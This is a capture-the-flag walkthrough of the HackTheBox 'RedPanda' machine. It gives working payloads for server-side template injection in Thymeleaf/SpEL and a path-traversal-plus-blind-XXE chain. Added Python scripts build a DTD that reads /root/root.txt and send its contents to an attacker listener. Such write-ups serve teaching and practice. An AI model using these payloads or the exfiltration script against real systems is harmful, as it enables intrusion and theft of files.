RedPanda — Hackthebox walkthrough
User
Nmap gives us 2 open ports
nmap --open -sC -sV 10.10.11.170
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
8080/tcp open http-proxy syn-ack
|_http-title: Red Panda Search | Made with Spring Boot
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
Looking at port 8080, we get a page to search for pandas.
The page has a search field. Searching for a word reflects the input on the results page, so I started testing it for different vulnerabilities. After a couple of tries I got an interesting result with this payload:
(1+1)
The expression was evaluated and the page showed 2.
An input that is evaluated rather than merely reflected is the signature of Server-Side Template Injection (SSTI), so I kept trying different payloads to identify which template engine is in use. After a couple of tries I confirmed that it is a Java engine: the following payload is evaluated and dumps the process environment.
*{T(java.lang.System).getenv()}
NOTE: If you look up Java SSTI payloads you will see that they all start with $. This one does not. While trying different payloads I noticed that some characters are banned, namely $ and _, so I needed a payload that contains neither. Replacing $ with * worked: *{...} is the selection-expression syntax of Thymeleaf (the template engine the Spring Boot banner points to), and the expression inside it is evaluated with the Spring Expression Language (SpEL) exactly as in ${...}, which is what T(java.lang.System) relies on.
After looking around, I was able to get a reverse shell with a payload of the same form.
You can get all the SSTI payloads I used from here.
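The probing described above, automated as an added example (this is not code from the original write-up). It sends arithmetic probes for several template syntaxes, drops any probe that contains a banned character, and tells an evaluated response apart from a reflected one. The search endpoint and parameter name (POST /search, parameter "name") are assumptions not stated on the page, and fake_target() is a constructed stand-in for the real application so the script runs offline.

```python
"""Probe a reflected search field for SSTI without using banned characters.

Added example, not code from the original write-up. Assumed (not stated on
the page): the search form posts a parameter named "name" to /search, and
fake_target() is a constructed stand-in for the real application.
"""
import re
import urllib.parse
import urllib.request

BANNED = set("$_")  # characters the write-up found to be rejected

# Arithmetic probes for common template syntaxes. A page that merely reflects
# input shows the probe verbatim; one that evaluates it shows 49.
PROBES = {
    "spel-selection": "*{7*7}",    # Thymeleaf *{...} -> SpEL, no banned chars
    "spel-variable":  "${7*7}",    # same engine via ${...}, but uses '$'
    "jinja/twig":     "{{7*7}}",
    "erb":            "<%= 7*7 %>",
}

def usable_probes(banned=BANNED):
    """Keep only the probes that contain no banned character."""
    return {k: v for k, v in PROBES.items() if not (set(v) & banned)}

def classify(probe, body):
    """'evaluated' if 49 appears as a standalone number, 'reflected' if the
    probe came back verbatim, otherwise 'absent'."""
    if probe in body:
        return "reflected"
    if re.search(r"(?<![0-9])49(?![0-9])", body):
        return "evaluated"
    return "absent"

def probe_target(send, banned=BANNED):
    """send(query) -> response body. Returns {syntax: verdict}."""
    return {k: classify(v, send(v)) for k, v in usable_probes(banned).items()}

def http_send(base_url):
    """Real transport for the assumed POST /search with parameter 'name'."""
    def send(query):
        data = urllib.parse.urlencode({"name": query}).encode()
        with urllib.request.urlopen(base_url + "/search", data=data, timeout=10) as r:
            return r.read().decode(errors="replace")
    return send

def fake_target(query):
    """Constructed stand-in for the vulnerable app: rejects banned characters,
    evaluates *{a*b} and reflects anything else."""
    if set(query) & BANNED:
        return "<h1>Error: banned characters</h1>"
    m = re.fullmatch(r"\*\{(\d+)\*(\d+)\}", query)
    shown = str(int(m.group(1)) * int(m.group(2))) if m else query
    return f"<h2>You searched for: {shown}</h2><p>No results</p>"

if __name__ == "__main__":
    # Against a live host: probe_target(http_send("http://10.10.11.170:8080"))
    for syntax, verdict in probe_target(fake_target).items():
        print(f"{syntax:15} {verdict}")
```

The ${7*7} probe never leaves the script because it contains a banned character, which is exactly why the *{...} form is the one that gets through; the standalone-number check keeps a page that happens to contain "1490" from being mistaken for an evaluation.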
Root
Running pspy shows a cron job that periodically invokes a Java application under the /opt/ directory. Looking in that directory, the source code of the application the cron job runs is at /opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java
Reading the source, a few things stand out:
1. main() loads the log file /opt/panda_search/redpanda.log and passes it to parsLog(). That function takes each line and splits it on the delimiter ||.
2. Once a line is parsed, the value of uri is passed to getArtist() to get the name of the artist. That function loads the image at the path given by uri and looks through its metadata for an entry called Artist; when it finds one, it returns the value of that tag.
3. An XML file is then updated according to the artist's name in addViewTo(). Here we can see that SAXBuilder is used to parse and edit the XML file.
Looking up vulnerabilities for this library: SAXBuilder resolves external entities in its default configuration, so if the XML document it parses is under our control, a crafted document gives XML External Entity (XXE) injection and lets us read arbitrary files with the privileges of the cron job.
Now that we know this, we can put the pieces together. First we add an entry to the redpanda.log file, because that is where the application reads the image path from:
echo "200||10.10.14.101||Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0||/../../../../../../../tmp/kavi.jpg" >> /opt/panda_search/redpanda.log
If you look at where that path is used, there is no input validation: the path we provide is simply appended to the image directory. So we can use ../../../../ to escape from that directory and point the parser at an image of our own.
Next we add a metadata entry named Artist to that image and set its value. The source does no validation here either, so the same trick lets us specify the XML file we want the parser to open. The file must be a real JPEG so the metadata reader accepts it; add the entry with exiftool:
exiftool -Artist=../../tmp/kavi kavi.jpg
Now we need the XML file that exploits the XXE vulnerability. The parser's output is never shown to us, so this is a blind XXE: a typical payload that expands the file into the document would tell us nothing. We have to use an out-of-band (OOB) technique instead.
The concept is to make the parser load a DTD file that we host. That DTD defines an entity that reads the root flag and a second entity whose URL points at a server we control, with the flag set as a request parameter; resolving the second entity sends the flag to us.
One thing to note when naming the XML file: the string _creds.xml is appended to the artist's name to build the path. With ../../tmp/kavi as the artist, the location of the XML file is going to be /credits/../../tmp/kavi_creds.xml, which resolves to /tmp/kavi_creds.xml.
(Find the payloads from here.) There are two files:
kavi_creds.xml
kavi.dtd
The XML file pulls in kavi.dtd, which reads /root/root.txt and sends it to us. Once these files are created, put the XML file in /tmp, so /tmp should contain two files: kavi.jpg and kavi_creds.xml.
You have to host kavi.dtd on your own web server as well, at the URL the XML file references. Once all that is done, you just have to wait for the cron to run.
When it runs, your web server log should show the parser fetching kavi.dtd followed by a second request carrying the flag as a parameter.
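The staging steps above, collected into one script as an added example; these are not the write-up's own payload files. It builds the log line, the external DTD and the kavi_creds.xml that references it, and runs a small HTTP listener that serves the DTD and prints whatever the second entity resolution sends back. Assumptions, labelled in the code: the element layout of the XML body (the page gives only the file's name and location), an attacker listener on 10.10.14.101:8000, and that the cron job can read /root/root.txt. Run it on the attacker host, copy kavi.jpg and kavi_creds.xml to /tmp on the box, and append the printed line to /opt/panda_search/redpanda.log.

```python
"""Stage the out-of-band XXE chain described above and catch the callback.

Added example, not the write-up's own payload files. Assumed (the page does
not show them): the structure of the *_creds.xml body, an attacker listener
on 10.10.14.101:8000, and that the cron job can read /root/root.txt.
"""
import http.server
import os
import urllib.parse

ATTACKER = "10.10.14.101"  # host in the log entry's IP field; assumed listener
PORT = 8000                # assumed listener port
NAME = "kavi"              # artist "../../tmp/kavi" -> /tmp/kavi_creds.xml

def log_entry(ip, ua, uri):
    """One redpanda.log line: four fields joined by '||', uri is the image path."""
    return f"200||{ip}||{ua}||{uri}"

def dtd(target_file="/root/root.txt"):
    """External DTD: %file reads the target; %eval declares a second entity
    whose SYSTEM id embeds it, so resolving %exfil sends the content to us.
    &#x25; is an escaped '%' so the inner declaration survives the first parse."""
    url = f"http://{ATTACKER}:{PORT}/?x=%file;"
    return "\n".join([
        f'<!ENTITY % file SYSTEM "file://{target_file}">',
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{url}\'">',
        "%eval;",
        "%exfil;",
    ]) + "\n"

def creds_xml(artist):
    """The kavi_creds.xml the parser opens. The DOCTYPE pulls in the remote DTD;
    the element layout below is assumed, kept minimal and well-formed."""
    return "\n".join([
        '<?xml version="1.0" encoding="UTF-8"?>',
        "<!DOCTYPE credits [",
        f'  <!ENTITY % remote SYSTEM "http://{ATTACKER}:{PORT}/{NAME}.dtd">',
        "  %remote;",
        "]>",
        "<credits>",
        f"  <author>{artist}</author>",
        "  <image>",
        "    <uri>/img/placeholder.jpg</uri>",
        "    <views>0</views>",
        "  </image>",
        "  <totalviews>0</totalviews>",
        "</credits>",
    ]) + "\n"

def stage(out_dir):
    """Write kavi_creds.xml and kavi.dtd into out_dir; return the log line."""
    with open(os.path.join(out_dir, f"{NAME}_creds.xml"), "w") as f:
        f.write(creds_xml(f"../../tmp/{NAME}"))
    with open(os.path.join(out_dir, f"{NAME}.dtd"), "w") as f:
        f.write(dtd())
    return log_entry(ATTACKER, "Mozilla/5.0", f"/../../../../../../../tmp/{NAME}.jpg")

def exfiltrated(path):
    """Pull the file content out of the callback path '/?x=<content>'."""
    vals = urllib.parse.parse_qs(urllib.parse.urlparse(path).query).get("x")
    return vals[0] if vals else None

class Catcher(http.server.BaseHTTPRequestHandler):
    """Serves kavi.dtd, then prints whatever the %exfil resolution sends back."""
    def do_GET(self):
        body = dtd().encode() if self.path == f"/{NAME}.dtd" else b""
        got = exfiltrated(self.path)
        if got is not None:
            print(f"[+] exfiltrated: {got}")
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    print("append to /opt/panda_search/redpanda.log:", stage("."))
    http.server.HTTPServer(("0.0.0.0", PORT), Catcher).serve_forever()
```

The two-stage DTD is what makes the blind case work: an entity value may not reference a parameter entity directly in the internal subset, so the file is read into %file in the external DTD and the URL that carries it is only declared once %eval has been expanded.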
Contact me through social media:
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄